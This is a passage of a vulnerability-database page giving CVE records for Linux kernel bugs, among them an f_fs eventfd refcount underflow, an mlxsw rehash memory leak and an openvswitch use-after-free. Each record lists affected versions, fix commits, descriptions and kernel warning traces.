              "versionType": "git"
            },
            {
              "lessThan": "52500239e3f2d6fc77b6f58632a9fb98fe74ac09",
              "status": "affected",
              "version": "5e33f6fdf735cda1d4580fe6f1878da05718fe73",
              "versionType": "git"
            },
            {
              "lessThan": "33f6a0cbb7772146e1c11f38028fffbfed14728b",
              "status": "affected",
              "version": "5e33f6fdf735cda1d4580fe6f1878da05718fe73",
              "versionType": "git"
            },
            {
              "lessThan": "240fc586e83d645912accce081a48aa63a45f6ee",
              "status": "affected",
              "version": "5e33f6fdf735cda1d4580fe6f1878da05718fe73",
              "versionType": "git"
            },
            {
              "lessThan": "1c4ace3e6b8575745c50dca9e76e0021e697d645",
              "status": "affected",
              "version": "5e33f6fdf735cda1d4580fe6f1878da05718fe73",
              "versionType": "git"
            },
            {
              "lessThan": "ebef2aa29f370b5096c16020c104e393192ef684",
              "status": "affected",
              "version": "5e33f6fdf735cda1d4580fe6f1878da05718fe73",
              "versionType": "git"
            },
            {
              "lessThan": "b1e0887379422975f237d43d8839b751a6bcf154",
              "status": "affected",
              "version": "5e33f6fdf735cda1d4580fe6f1878da05718fe73",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "drivers/usb/gadget/function/f_fs.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "4.0"
            },
            {
              "lessThan": "4.0",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "4.4.*",
              "status": "unaffected",
              "version": "4.4.298",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "4.9.*",
              "status": "unaffected",
              "version": "4.9.296",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "4.14.*",
              "status": "unaffected",
              "version": "4.14.261",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "4.19.*",
              "status": "unaffected",
              "version": "4.19.224",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.4.*",
              "status": "unaffected",
              "version": "5.4.170",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.90",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.13",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "5.16",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "4.4.298",
                  "versionStartIncluding": "4.0",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "4.9.296",
                  "versionStartIncluding": "4.0",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "4.14.261",
                  "versionStartIncluding": "4.0",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "4.19.224",
                  "versionStartIncluding": "4.0",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.4.170",
                  "versionStartIncluding": "4.0",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.90",
                  "versionStartIncluding": "4.0",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.13",
                  "versionStartIncluding": "4.0",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.16",
                  "versionStartIncluding": "4.0",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nusb: gadget: f_fs: Clear ffs_eventfd in ffs_data_clear.\n\nffs_data_clear is indirectly called from both ffs_fs_kill_sb and\nffs_ep0_release, so it ends up being called twice when userland closes ep0\nand then unmounts f_fs.\nIf userland provided an eventfd along with function\u0027s USB descriptors, it\nends up calling eventfd_ctx_put as many times, causing a refcount\nunderflow.\nNULL-ify ffs_eventfd to prevent these extraneous eventfd_ctx_put calls.\n\nAlso, set epfiles to NULL right after de-allocating it, for readability.\n\nFor completeness, ffs_data_clear actually ends up being called thrice, the\nlast call being before the whole ffs structure gets freed, so when this\nspecific sequence happens there is a second underflow happening (but not\nbeing reported):\n\n/sys/kernel/debug/tracing# modprobe usb_f_fs\n/sys/kernel/debug/tracing# echo ffs_data_clear \u003e set_ftrace_filter\n/sys/kernel/debug/tracing# echo function \u003e current_tracer\n/sys/kernel/debug/tracing# echo 1 \u003e tracing_on\n(setup gadget, run and kill function userland process, teardown gadget)\n/sys/kernel/debug/tracing# echo 0 \u003e tracing_on\n/sys/kernel/debug/tracing# cat trace\n smartcard-openp-436     [000] .....  1946.208786: ffs_data_clear \u003c-ffs_data_closed\n smartcard-openp-431     [000] .....  1946.279147: ffs_data_clear \u003c-ffs_data_closed\n smartcard-openp-431     [000] .n...  1946.905512: ffs_data_clear \u003c-ffs_data_put\n\nWarning output corresponding to above trace:\n[ 1946.284139] WARNING: CPU: 0 PID: 431 at lib/refcount.c:28 refcount_warn_saturate+0x110/0x15c\n[ 1946.293094] refcount_t: underflow; use-after-free.\n[ 1946.298164] Modules linked in: usb_f_ncm(E) u_ether(E) usb_f_fs(E) hci_uart(E) btqca(E) btrtl(E) btbcm(E) btintel(E) bluetooth(E) nls_ascii(E) nls_cp437(E) vfat(E) fat(E) bcm2835_v4l2(CE) bcm2835_mmal_vchiq(CE) videobuf2_vmalloc(E) videobuf2_memops(E) sha512_generic(E) videobuf2_v4l2(E) sha512_arm(E) videobuf2_common(E) videodev(E) cpufreq_dt(E) snd_bcm2835(CE) brcmfmac(E) mc(E) vc4(E) ctr(E) brcmutil(E) snd_soc_core(E) snd_pcm_dmaengine(E) drbg(E) snd_pcm(E) snd_timer(E) snd(E) soundcore(E) drm_kms_helper(E) cec(E) ansi_cprng(E) rc_core(E) syscopyarea(E) raspberrypi_cpufreq(E) sysfillrect(E) sysimgblt(E) cfg80211(E) max17040_battery(OE) raspberrypi_hwmon(E) fb_sys_fops(E) regmap_i2c(E) ecdh_generic(E) rfkill(E) ecc(E) bcm2835_rng(E) rng_core(E) vchiq(CE) leds_gpio(E) libcomposite(E) fuse(E) configfs(E) ip_tables(E) x_tables(E) autofs4(E) ext4(E) crc16(E) mbcache(E) jbd2(E) crc32c_generic(E) sdhci_iproc(E) sdhci_pltfm(E) sdhci(E)\n[ 1946.399633] CPU: 0 PID: 431 Comm: smartcard-openp Tainted: G         C OE     5.15.0-1-rpi #1  Debian 5.15.3-1\n[ 1946.417950] Hardware name: BCM2835\n[ 1946.425442] Backtrace:\n[ 1946.432048] [\u003cc08d60a0\u003e] (dump_backtrace) from [\u003cc08d62ec\u003e] (show_stack+0x20/0x24)\n[ 1946.448226]  r7:00000009 r6:0000001c r5:c04a948c r4:c0a64e2c\n[ 1946.458412] [\u003cc08d62cc\u003e] (show_stack) from [\u003cc08d9ae0\u003e] (dump_stack+0x28/0x30)\n[ 1946.470380] [\u003cc08d9ab8\u003e] (dump_stack) from [\u003cc0123500\u003e] (__warn+0xe8/0x154)\n[ 1946.482067]  r5:c04a948c r4:c0a71dc8\n[ 1946.490184] [\u003cc0123418\u003e] (__warn) from [\u003cc08d6948\u003e] (warn_slowpath_fmt+0xa0/0xe4)\n[ 1946.506758]  r7:00000009 r6:0000001c r5:c0a71dc8 r4:c0a71e04\n[ 1946.517070] [\u003cc08d68ac\u003e] (warn_slowpath_fmt) from [\u003cc04a948c\u003e] (refcount_warn_saturate+0x110/0x15c)\n[ 1946.535309]  r8:c0100224 r7:c0dfcb84 r6:ffffffff r5:c3b84c00 r4:c24a17c0\n[ 1946.546708] [\u003cc04a937c\u003e] (refcount_warn_saturate) from [\u003cc0380134\u003e] (eventfd_ctx_put+0x48/0x74)\n[ 1946.564476] [\u003cc03800ec\u003e] (eventfd_ctx_put) from [\u003cbf5464e8\u003e] (ffs_data_clear+0xd0/0x118 [usb_f_fs])\n[ 1946.582664]  r5:c3b84c00 r4:c2695b00\n[ 1946.590668] [\u003cbf546418\u003e] (ffs_data_clear [usb_f_fs]) from [\u003cbf547cc0\u003e] (ffs_data_closed+0x9c/0x150 [usb_f_fs])\n[ 1946.609608]  r5:bf54d014 r4:c2695b00\n[ 1946.617522] [\u003cbf547c24\u003e] (ffs_data_closed [usb_f_fs]) from [\u003cbf547da0\u003e] (ffs_fs_kill_sb+0x2c/0x30 [usb_f_fs])\n[ 1946.636217]  r7:c0dfcb\n---truncated---"
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T07:00:37.229Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/f976dd7011150244a7ba820f2c331e9fb253befa"
        },
        {
          "url": "https://git.kernel.org/stable/c/cc8c8028c21b2a3842a1e98e99e55028df275919"
        },
        {
          "url": "https://git.kernel.org/stable/c/52500239e3f2d6fc77b6f58632a9fb98fe74ac09"
        },
        {
          "url": "https://git.kernel.org/stable/c/33f6a0cbb7772146e1c11f38028fffbfed14728b"
        },
        {
          "url": "https://git.kernel.org/stable/c/240fc586e83d645912accce081a48aa63a45f6ee"
        },
        {
          "url": "https://git.kernel.org/stable/c/1c4ace3e6b8575745c50dca9e76e0021e697d645"
        },
        {
          "url": "https://git.kernel.org/stable/c/ebef2aa29f370b5096c16020c104e393192ef684"
        },
        {
          "url": "https://git.kernel.org/stable/c/b1e0887379422975f237d43d8839b751a6bcf154"
        }
      ],
      "title": "usb: gadget: f_fs: Clear ffs_eventfd in ffs_data_clear.",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2021-46933",
    "datePublished": "2024-02-27T09:44:00.758Z",
    "dateReserved": "2024-02-25T13:45:52.720Z",
    "dateUpdated": "2025-05-04T07:00:37.229Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2024-35918 (GCVE-0-2024-35918)

Vulnerability from cvelistv5 – Published: 2024-05-19 10:10 – Updated: 2024-07-30 04:55

This CVE ID has been rejected or withdrawn by its CVE Numbering Authority.

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "cna": {
      "providerMetadata": {
        "dateUpdated": "2024-07-30T04:55:53.692Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "rejectedReasons": [
        {
          "lang": "en",
          "value": "This CVE ID has been rejected or withdrawn by its CVE Numbering Authority."
        }
      ]
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-35918",
    "datePublished": "2024-05-19T10:10:31.033Z",
    "dateRejected": "2024-07-30T04:55:53.692Z",
    "dateReserved": "2024-05-17T13:50:33.123Z",
    "dateUpdated": "2024-07-30T04:55:53.692Z",
    "state": "REJECTED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2024-35853 (GCVE-0-2024-35853)

Vulnerability from cvelistv5 – Published: 2024-05-17 14:47 – Updated: 2025-05-04 09:06

Title

mlxsw: spectrum_acl_tcam: Fix memory leak during rehash

Summary

In the Linux kernel, the following vulnerability has been resolved: mlxsw: spectrum_acl_tcam: Fix memory leak during rehash The rehash delayed work migrates filters from one region to another. This is done by iterating over all chunks (all the filters with the same priority) in the region and in each chunk iterating over all the filters. If the migration fails, the code tries to migrate the filters back to the old region. However, the rollback itself can also fail in which case another migration will be erroneously performed. Besides the fact that this ping pong is not a very good idea, it also creates a problem. Each virtual chunk references two chunks: The currently used one ('vchunk->chunk') and a backup ('vchunk->chunk2'). During migration the first holds the chunk we want to migrate filters to and the second holds the chunk we are migrating filters from. The code currently assumes - but does not verify - that the backup chunk does not exist (NULL) if the currently used chunk does not reference the target region. This assumption breaks when we are trying to rollback a rollback, resulting in the backup chunk being overwritten and leaked [1]. Fix by not rolling back a failed rollback and add a warning to avoid future cases. [1] WARNING: CPU: 5 PID: 1063 at lib/parman.c:291 parman_destroy+0x17/0x20 Modules linked in: CPU: 5 PID: 1063 Comm: kworker/5:11 Tainted: G W 6.9.0-rc2-custom-00784-gc6a05c468a0b #14 Hardware name: Mellanox Technologies Ltd. MSN3700/VMOD0005, BIOS 5.11 01/06/2019 Workqueue: mlxsw_core mlxsw_sp_acl_tcam_vregion_rehash_work RIP: 0010:parman_destroy+0x17/0x20 [...] Call Trace: <TASK> mlxsw_sp_acl_atcam_region_fini+0x19/0x60 mlxsw_sp_acl_tcam_region_destroy+0x49/0xf0 mlxsw_sp_acl_tcam_vregion_rehash_work+0x1f1/0x470 process_one_work+0x151/0x370 worker_thread+0x2cb/0x3e0 kthread+0xd0/0x100 ret_from_fork+0x34/0x50 ret_from_fork_asm+0x1a/0x30 </TASK>

Severity ?

6.4 (Medium)


                        
                          CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:H

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/c6f3fa7f5a748bf6e…
	https://git.kernel.org/stable/c/617e98ba4c50f4547…
	https://git.kernel.org/stable/c/413a01886c3958d4b…
	https://git.kernel.org/stable/c/b822644fd90992ee3…
	https://git.kernel.org/stable/c/0ae8ff7b6d42e3394…
	https://git.kernel.org/stable/c/b3fd51f684a071150…
	https://git.kernel.org/stable/c/8ca3f7a7b61393804…

Impacted products

Vendor

Product

Version

Linux

Affected: 843500518509128a935edab96bd8efef7c54669e , < c6f3fa7f5a748bf6e5c4eb742686d6952f854e76 (git)
Affected: 843500518509128a935edab96bd8efef7c54669e , < 617e98ba4c50f4547c9eb0946b1cfc26937d70d1 (git)
Affected: 843500518509128a935edab96bd8efef7c54669e , < 413a01886c3958d4b8aac23a3bff3d430b92093e (git)
Affected: 843500518509128a935edab96bd8efef7c54669e , < b822644fd90992ee362c5e0c8d2556efc8856c76 (git)
Affected: 843500518509128a935edab96bd8efef7c54669e , < 0ae8ff7b6d42e33943af462910bdcfa2ec0cb8cf (git)
Affected: 843500518509128a935edab96bd8efef7c54669e , < b3fd51f684a0711504f82de510da109ae639722d (git)
Affected: 843500518509128a935edab96bd8efef7c54669e , < 8ca3f7a7b61393804c46f170743c3b839df13977 (git)

Linux

Affected: 5.1
Unaffected: 0 , < 5.1 (semver)
Unaffected: 5.4.275 , ≤ 5.4.* (semver)
Unaffected: 5.10.216 , ≤ 5.10.* (semver)
Unaffected: 5.15.158 , ≤ 5.15.* (semver)
Unaffected: 6.1.90 , ≤ 6.1.* (semver)
Unaffected: 6.6.30 , ≤ 6.6.* (semver)
Unaffected: 6.8.9 , ≤ 6.8.* (semver)
Unaffected: 6.9 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "affected": [
          {
            "cpes": [
              "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*"
            ],
            "defaultStatus": "affected",
            "product": "linux_kernel",
            "vendor": "linux",
            "versions": [
              {
                "lessThan": "c6f3fa7f5a74",
                "status": "affected",
                "version": "843500518509",
                "versionType": "git"
              },
              {
                "lessThan": "617e98ba4c50",
                "status": "affected",
                "version": "843500518509",
                "versionType": "git"
              },
              {
                "lessThan": "413a01886c39",
                "status": "affected",
                "version": "843500518509",
                "versionType": "git"
              },
              {
                "lessThan": "b822644fd909",
                "status": "affected",
                "version": "843500518509",
                "versionType": "git"
              },
              {
                "lessThan": "0ae8ff7b6d42",
                "status": "affected",
                "version": "843500518509",
                "versionType": "git"
              },
              {
                "lessThan": "b3fd51f684a0",
                "status": "affected",
                "version": "843500518509",
                "versionType": "git"
              },
              {
                "lessThan": "8ca3f7a7b613",
                "status": "affected",
                "version": "843500518509",
                "versionType": "git"
              }
            ]
          }
        ],
        "metrics": [
          {
            "cvssV3_1": {
              "attackComplexity": "HIGH",
              "attackVector": "NETWORK",
              "availabilityImpact": "HIGH",
              "baseScore": 6.4,
              "baseSeverity": "MEDIUM",
              "confidentialityImpact": "LOW",
              "integrityImpact": "LOW",
              "privilegesRequired": "LOW",
              "scope": "UNCHANGED",
              "userInteraction": "NONE",
              "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:H",
              "version": "3.1"
            }
          },
          {
            "other": {
              "content": {
                "id": "CVE-2024-35853",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-05-20T17:34:35.252109Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-08-01T13:51:48.800Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T03:21:48.394Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/c6f3fa7f5a748bf6e5c4eb742686d6952f854e76"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/617e98ba4c50f4547c9eb0946b1cfc26937d70d1"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/413a01886c3958d4b8aac23a3bff3d430b92093e"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/b822644fd90992ee362c5e0c8d2556efc8856c76"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/0ae8ff7b6d42e33943af462910bdcfa2ec0cb8cf"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/b3fd51f684a0711504f82de510da109ae639722d"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/8ca3f7a7b61393804c46f170743c3b839df13977"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "drivers/net/ethernet/mellanox/mlxsw/spectrum_acl_tcam.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "c6f3fa7f5a748bf6e5c4eb742686d6952f854e76",
              "status": "affected",
              "version": "843500518509128a935edab96bd8efef7c54669e",
              "versionType": "git"
            },
            {
              "lessThan": "617e98ba4c50f4547c9eb0946b1cfc26937d70d1",
              "status": "affected",
              "version": "843500518509128a935edab96bd8efef7c54669e",
              "versionType": "git"
            },
            {
              "lessThan": "413a01886c3958d4b8aac23a3bff3d430b92093e",
              "status": "affected",
              "version": "843500518509128a935edab96bd8efef7c54669e",
              "versionType": "git"
            },
            {
              "lessThan": "b822644fd90992ee362c5e0c8d2556efc8856c76",
              "status": "affected",
              "version": "843500518509128a935edab96bd8efef7c54669e",
              "versionType": "git"
            },
            {
              "lessThan": "0ae8ff7b6d42e33943af462910bdcfa2ec0cb8cf",
              "status": "affected",
              "version": "843500518509128a935edab96bd8efef7c54669e",
              "versionType": "git"
            },
            {
              "lessThan": "b3fd51f684a0711504f82de510da109ae639722d",
              "status": "affected",
              "version": "843500518509128a935edab96bd8efef7c54669e",
              "versionType": "git"
            },
            {
              "lessThan": "8ca3f7a7b61393804c46f170743c3b839df13977",
              "status": "affected",
              "version": "843500518509128a935edab96bd8efef7c54669e",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "drivers/net/ethernet/mellanox/mlxsw/spectrum_acl_tcam.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "5.1"
            },
            {
              "lessThan": "5.1",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.4.*",
              "status": "unaffected",
              "version": "5.4.275",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.216",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.158",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.90",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.30",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.8.*",
              "status": "unaffected",
              "version": "6.8.9",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.9",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.4.275",
                  "versionStartIncluding": "5.1",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.216",
                  "versionStartIncluding": "5.1",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.158",
                  "versionStartIncluding": "5.1",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.90",
                  "versionStartIncluding": "5.1",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.30",
                  "versionStartIncluding": "5.1",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.8.9",
                  "versionStartIncluding": "5.1",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9",
                  "versionStartIncluding": "5.1",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nmlxsw: spectrum_acl_tcam: Fix memory leak during rehash\n\nThe rehash delayed work migrates filters from one region to another.\nThis is done by iterating over all chunks (all the filters with the same\npriority) in the region and in each chunk iterating over all the\nfilters.\n\nIf the migration fails, the code tries to migrate the filters back to\nthe old region. However, the rollback itself can also fail in which case\nanother migration will be erroneously performed. Besides the fact that\nthis ping pong is not a very good idea, it also creates a problem.\n\nEach virtual chunk references two chunks: The currently used one\n(\u0027vchunk-\u003echunk\u0027) and a backup (\u0027vchunk-\u003echunk2\u0027). During migration the\nfirst holds the chunk we want to migrate filters to and the second holds\nthe chunk we are migrating filters from.\n\nThe code currently assumes - but does not verify - that the backup chunk\ndoes not exist (NULL) if the currently used chunk does not reference the\ntarget region. This assumption breaks when we are trying to rollback a\nrollback, resulting in the backup chunk being overwritten and leaked\n[1].\n\nFix by not rolling back a failed rollback and add a warning to avoid\nfuture cases.\n\n[1]\nWARNING: CPU: 5 PID: 1063 at lib/parman.c:291 parman_destroy+0x17/0x20\nModules linked in:\nCPU: 5 PID: 1063 Comm: kworker/5:11 Tainted: G        W          6.9.0-rc2-custom-00784-gc6a05c468a0b #14\nHardware name: Mellanox Technologies Ltd. MSN3700/VMOD0005, BIOS 5.11 01/06/2019\nWorkqueue: mlxsw_core mlxsw_sp_acl_tcam_vregion_rehash_work\nRIP: 0010:parman_destroy+0x17/0x20\n[...]\nCall Trace:\n \u003cTASK\u003e\n mlxsw_sp_acl_atcam_region_fini+0x19/0x60\n mlxsw_sp_acl_tcam_region_destroy+0x49/0xf0\n mlxsw_sp_acl_tcam_vregion_rehash_work+0x1f1/0x470\n process_one_work+0x151/0x370\n worker_thread+0x2cb/0x3e0\n kthread+0xd0/0x100\n ret_from_fork+0x34/0x50\n ret_from_fork_asm+0x1a/0x30\n \u003c/TASK\u003e"
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T09:06:52.551Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/c6f3fa7f5a748bf6e5c4eb742686d6952f854e76"
        },
        {
          "url": "https://git.kernel.org/stable/c/617e98ba4c50f4547c9eb0946b1cfc26937d70d1"
        },
        {
          "url": "https://git.kernel.org/stable/c/413a01886c3958d4b8aac23a3bff3d430b92093e"
        },
        {
          "url": "https://git.kernel.org/stable/c/b822644fd90992ee362c5e0c8d2556efc8856c76"
        },
        {
          "url": "https://git.kernel.org/stable/c/0ae8ff7b6d42e33943af462910bdcfa2ec0cb8cf"
        },
        {
          "url": "https://git.kernel.org/stable/c/b3fd51f684a0711504f82de510da109ae639722d"
        },
        {
          "url": "https://git.kernel.org/stable/c/8ca3f7a7b61393804c46f170743c3b839df13977"
        }
      ],
      "title": "mlxsw: spectrum_acl_tcam: Fix memory leak during rehash",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-35853",
    "datePublished": "2024-05-17T14:47:30.109Z",
    "dateReserved": "2024-05-17T13:50:33.106Z",
    "dateUpdated": "2025-05-04T09:06:52.551Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2024-27395 (GCVE-0-2024-27395)

Vulnerability from cvelistv5 – Published: 2024-05-09 16:37 – Updated: 2025-05-04 09:04

Title

net: openvswitch: Fix Use-After-Free in ovs_ct_exit

Summary

In the Linux kernel, the following vulnerability has been resolved: net: openvswitch: Fix Use-After-Free in ovs_ct_exit Since kfree_rcu, which is called in the hlist_for_each_entry_rcu traversal of ovs_ct_limit_exit, is not part of the RCU read critical section, it is possible that the RCU grace period will pass during the traversal and the key will be free. To prevent this, it should be changed to hlist_for_each_entry_safe.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/2db9a8c0a01fa1c76…
	https://git.kernel.org/stable/c/589523cf0b384164e…
	https://git.kernel.org/stable/c/35880c3fa6f8fe281…
	https://git.kernel.org/stable/c/9048616553c65e750…
	https://git.kernel.org/stable/c/bca6fa2d9a9f560e6…
	https://git.kernel.org/stable/c/eaa5e164a2110d2fb…
	https://git.kernel.org/stable/c/edee0758747d7c219…
	https://git.kernel.org/stable/c/5ea7b72d4fac2fdbc…

Impacted products

Vendor

Product

Version

Linux

Affected: 11efd5cb04a184eea4f57b68ea63dddd463158d1 , < 2db9a8c0a01fa1c762c1e61a13c212c492752994 (git)
Affected: 11efd5cb04a184eea4f57b68ea63dddd463158d1 , < 589523cf0b384164e445dd5db8d5b1bf97982424 (git)
Affected: 11efd5cb04a184eea4f57b68ea63dddd463158d1 , < 35880c3fa6f8fe281a19975d2992644588ca33d3 (git)
Affected: 11efd5cb04a184eea4f57b68ea63dddd463158d1 , < 9048616553c65e750d43846f225843ed745ec0d4 (git)
Affected: 11efd5cb04a184eea4f57b68ea63dddd463158d1 , < bca6fa2d9a9f560e6b89fd5190b05cc2f5d422c1 (git)
Affected: 11efd5cb04a184eea4f57b68ea63dddd463158d1 , < eaa5e164a2110d2fb9e16c8a29e4501882235137 (git)
Affected: 11efd5cb04a184eea4f57b68ea63dddd463158d1 , < edee0758747d7c219e29db9ed1d4eb33e8d32865 (git)
Affected: 11efd5cb04a184eea4f57b68ea63dddd463158d1 , < 5ea7b72d4fac2fdbc0425cd8f2ea33abe95235b2 (git)

Linux

Affected: 4.18
Unaffected: 0 , < 4.18 (semver)
Unaffected: 4.19.313 , ≤ 4.19.* (semver)
Unaffected: 5.4.275 , ≤ 5.4.* (semver)
Unaffected: 5.10.216 , ≤ 5.10.* (semver)
Unaffected: 5.15.158 , ≤ 5.15.* (semver)
Unaffected: 6.1.90 , ≤ 6.1.* (semver)
Unaffected: 6.6.30 , ≤ 6.6.* (semver)
Unaffected: 6.8.9 , ≤ 6.8.* (semver)
Unaffected: 6.9 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
